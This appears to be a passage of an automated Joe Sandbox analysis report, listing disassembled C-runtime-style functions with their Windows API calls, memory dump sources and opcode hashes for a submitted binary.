                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-537541572
                                                                                                                                                                                                                                                                  • Opcode ID: 2d1dd36f97e1816b1af0189e2566ce1af40df017865dcc8dc3d9d5cbae8af797
                                                                                                                                                                                                                                                                  • Instruction ID: 0899ef2b23c044e2d5487c887498262884e874d38199fe37861d0c718a2f9864
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d1dd36f97e1816b1af0189e2566ce1af40df017865dcc8dc3d9d5cbae8af797
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1F0A734B88358BBEB501B10DC06FA93E27EB51B40F148428F91CA62E1EB71DA10D595
                                                                                                                                                                                                                                                                  Function 006C81DC Relevance: 7.8, APIs: 5, Instructions: 298COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 83c3c2b60c30a8a8427aadcd73807ef779d94fdd05f10e9dc81c9a29dc356940
                                                                                                                                                                                                                                                                  • Instruction ID: 703044390d90cb3e6390260452ee36f7ac39c5f05c3506393a656b69a1cf706f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83c3c2b60c30a8a8427aadcd73807ef779d94fdd05f10e9dc81c9a29dc356940
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31B1D174A04649AFDB65CF98C880FBEBBB2EF46310F14815DE501AB391CB749D42CBA5
                                                                                                                                                                                                                                                                  Function 0067DEE0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067DF17
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067DFA8
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067E028
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate
                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                  • API String ID: 2268201637-1018135373
                                                                                                                                                                                                                                                                  • Opcode ID: fde01c3c55d623d44d8b6ddb0adc52e93bfc7efcdb9d9a91046ffa56e081aa08
                                                                                                                                                                                                                                                                  • Instruction ID: 721293684e073f90ebb145442635e39f63cc909eac4ae7a5dc1078527d8b5718
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fde01c3c55d623d44d8b6ddb0adc52e93bfc7efcdb9d9a91046ffa56e081aa08
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5941E634900209EBCF10EF68CC41AEEBBB7AF45314F54C499F8196B392D7359A16CB95
                                                                                                                                                                                                                                                                  Function 00688C6A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00688A7C), ref: 00688C77
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00688A7C), ref: 00688C81
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00688CA9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                  • Opcode ID: 3faa8eed6b75dd5ddd2344d6a55a3a6d836dafc006095d15bd371821626c6e2e
                                                                                                                                                                                                                                                                  • Instruction ID: 745a30cb719f0d6ba0b5fa26a8c0b5d99aa7cd54afbc53554e44200e9b3ba64d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3faa8eed6b75dd5ddd2344d6a55a3a6d836dafc006095d15bd371821626c6e2e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69E04F30286609BFEF142B60EC06B993A56AB11B41F908421F90DEA1F4EB65D910D698
                                                                                                                                                                                                                                                                  Function 006C57ED Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(763EDE73), ref: 006C5850
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006C5AAB
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006C5AF3
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006C5B96
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                  • Opcode ID: 46bf9633e610a6876a297d5fb7c737506220d132911f6ab8d0bedecac1921f58
                                                                                                                                                                                                                                                                  • Instruction ID: 44dec558d084e42f8f0e93262eb833ddc9fa14eb9f9bcae2b0934812e542c69d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46bf9633e610a6876a297d5fb7c737506220d132911f6ab8d0bedecac1921f58
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74D16975E006589FCB15CFA8C890AEDBBB6FF09310F18856EE816EB351D730A981CB54
                                                                                                                                                                                                                                                                  Function 006D17E0 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 006D17E8
                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006D1820
                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006D1840
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3328510275-0
                                                                                                                                                                                                                                                                  • Opcode ID: b7cc9a7a8fc5bd89d6a058c69038b51c8a779688f27ae12f55f028318b4224fb
                                                                                                                                                                                                                                                                  • Instruction ID: b136d2f007d68b168f1be343ae0ae30f5633bcc4672b96825f3d7fa77358d76d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7cc9a7a8fc5bd89d6a058c69038b51c8a779688f27ae12f55f028318b4224fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D1104F5E051197EA71567759C8ECAF6A6EDF8B3A4B10442AF40299300EBA4CD01D1F9
                                                                                                                                                                                                                                                                  Function 006C8A32 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 006C8A48
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 006C8A55
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 006C8A7B
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 006C8AA1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FilePointer$ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 142388799-0
                                                                                                                                                                                                                                                                  • Opcode ID: c839c5d4862feaf49a634cf9ba98a0751b21afec1c95af2a8f8587557435fc0e
                                                                                                                                                                                                                                                                  • Instruction ID: a6e8c53ae4d6beffb7b37d626dcdf37a3903c4334655824c6fd1cb7349f51680
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c839c5d4862feaf49a634cf9ba98a0751b21afec1c95af2a8f8587557435fc0e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4115A75900119FFCF249F94CC08EEE7FBAEF05360F10414AF824A22A0DB319A40DBA0
                                                                                                                                                                                                                                                                  Function 006E1695 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006E16AF
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006E16BB
                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 006E16CB
                                                                                                                                                                                                                                                                    • Part of subcall function 006E1749: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E16D0), ref: 006E175C
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006E16DF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3431868840-0
                                                                                                                                                                                                                                                                  • Opcode ID: cc629e0d92582d5bd1d35d9d2da14574cad0a9ac7e2f8397e26a5f48be0b2095
                                                                                                                                                                                                                                                                  • Instruction ID: a07fdddb9b58c9f4d35cec854316275a2944ec1016be9d1f56e02943d8ece742
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc629e0d92582d5bd1d35d9d2da14574cad0a9ac7e2f8397e26a5f48be0b2095
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00F05E3E101600ABCF221B97DC04A467BB7EB8A750B15842AF55986530DB329954EB64
                                                                                                                                                                                                                                                                  Function 006E17B1 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006E17C8
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006E17D4
                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 006E17E4
                                                                                                                                                                                                                                                                    • Part of subcall function 006E1749: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E16D0), ref: 006E175C
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006E17F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3431868840-0
